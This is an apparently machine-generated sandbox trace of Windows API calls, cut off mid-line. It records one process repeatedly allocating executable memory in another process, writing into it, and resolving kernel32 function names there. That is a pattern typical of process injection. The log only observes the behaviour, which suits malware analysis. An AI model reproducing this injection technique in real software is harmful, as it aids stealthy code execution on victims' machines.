[0184.577] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.577] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84840 | out: hHeap=0x2150000) returned 1 [0184.577] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.577] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.578] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.578] lstrlenA (lpString="RtlUnwindEx") returned 11 [0184.578] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.578] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d76a*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d76a*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.578] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84750 [0184.578] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.579] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84750*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84750*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.579] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.579] ResetEvent (hEvent=0x794) returned 1 [0184.579] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.580] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.580] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.580] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84750 | out: hHeap=0x2150000) returned 1 [0184.580] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.580] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.580] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.580] lstrlenA (lpString="RtlPcToFileHeader") returned 17 [0184.580] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.581] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d778*, nSize=0x12, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d778*, lpNumberOfBytesWritten=0xcd978*=0x12) returned 1 [0184.581] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.581] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c00 [0184.581] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.581] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84c00*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84c00*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.582] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.582] ResetEvent (hEvent=0x794) returned 1 [0184.582] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.582] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.583] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c00 | out: hHeap=0x2150000) returned 1 [0184.583] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.583] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.583] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.583] lstrlenA (lpString="RaiseException") returned 14 [0184.583] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.583] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d78c*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d78c*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.584] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ff0 [0184.584] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.584] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84ff0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84ff0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.585] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.585] ResetEvent (hEvent=0x794) returned 1 [0184.585] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.585] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.585] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.585] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ff0 | out: hHeap=0x2150000) returned 1 [0184.586] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.586] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.588] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.588] lstrlenA (lpString="InterlockedFlushSList") returned 21 [0184.588] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.588] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d79e*, nSize=0x16, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d79e*, lpNumberOfBytesWritten=0xcd978*=0x16) returned 1 [0184.588] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e848a0 [0184.589] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.589] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e848a0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e848a0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.589] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.590] ResetEvent (hEvent=0x794) returned 1 [0184.590] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.590] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.590] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.590] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e848a0 | out: hHeap=0x2150000) returned 1 [0184.590] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.590] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.591] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.591] lstrlenA (lpString="FreeLibrary") returned 11 [0184.591] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.591] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d7b6*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d7b6*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.591] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84cf0 [0184.591] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.591] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84cf0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84cf0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.592] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.592] ResetEvent (hEvent=0x794) returned 1 [0184.592] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.592] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.593] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.593] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84cf0 | out: hHeap=0x2150000) returned 1 [0184.593] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.593] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.593] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.593] lstrlenA (lpString="LoadLibraryExW") returned 14 [0184.593] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.593] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d7c4*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d7c4*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.594] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85110 [0184.594] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.594] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85110*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85110*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.594] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.595] ResetEvent (hEvent=0x794) returned 1 [0184.595] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.595] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.595] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.595] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85110 | out: hHeap=0x2150000) returned 1 [0184.595] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.596] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.596] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.596] lstrlenA (lpString="ExitProcess") returned 11 [0184.596] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.596] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d7d6*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d7d6*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.596] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d50 [0184.597] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.597] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84d50*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84d50*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.597] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.598] ResetEvent (hEvent=0x794) returned 1 [0184.598] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.598] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.598] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.598] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d50 | out: hHeap=0x2150000) returned 1 [0184.598] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.599] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.599] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.599] lstrlenA (lpString="GetModuleHandleExW") returned 18 [0184.599] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.599] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d7e4*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d7e4*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0184.599] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85170 [0184.599] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.600] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85170*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85170*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.600] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.600] ResetEvent (hEvent=0x794) returned 1 [0184.600] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.601] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.601] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.601] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85170 | out: hHeap=0x2150000) returned 1 [0184.601] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.601] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.601] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.601] lstrlenA (lpString="GetModuleFileNameA") returned 18 [0184.601] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.602] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d7fa*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d7fa*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0184.602] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c90 [0184.602] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.602] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84c90*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84c90*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.603] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.603] ResetEvent (hEvent=0x794) returned 1 [0184.603] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.603] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.603] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.604] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c90 | out: hHeap=0x2150000) returned 1 [0184.604] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.604] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.604] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.604] lstrlenA (lpString="GetACP") returned 6 [0184.604] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.604] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d810*, nSize=0x7, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d810*, lpNumberOfBytesWritten=0xcd978*=0x7) returned 1 [0184.605] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84cf0 [0184.605] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.605] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84cf0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84cf0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.606] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.606] ResetEvent (hEvent=0x794) returned 1 [0184.606] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.606] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.607] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.607] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84cf0 | out: hHeap=0x2150000) returned 1 [0184.607] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.607] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.625] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.625] lstrlenA (lpString="GetStdHandle") returned 12 [0184.625] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.625] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d81a*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d81a*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.634] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.634] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85260 [0184.634] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.634] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85260*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85260*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.634] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.635] ResetEvent (hEvent=0x794) returned 1 [0184.635] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.635] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.635] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.635] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85260 | out: hHeap=0x2150000) returned 1 [0184.635] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.636] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.636] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.636] lstrlenA (lpString="GetFileType") returned 11 [0184.636] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.636] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, 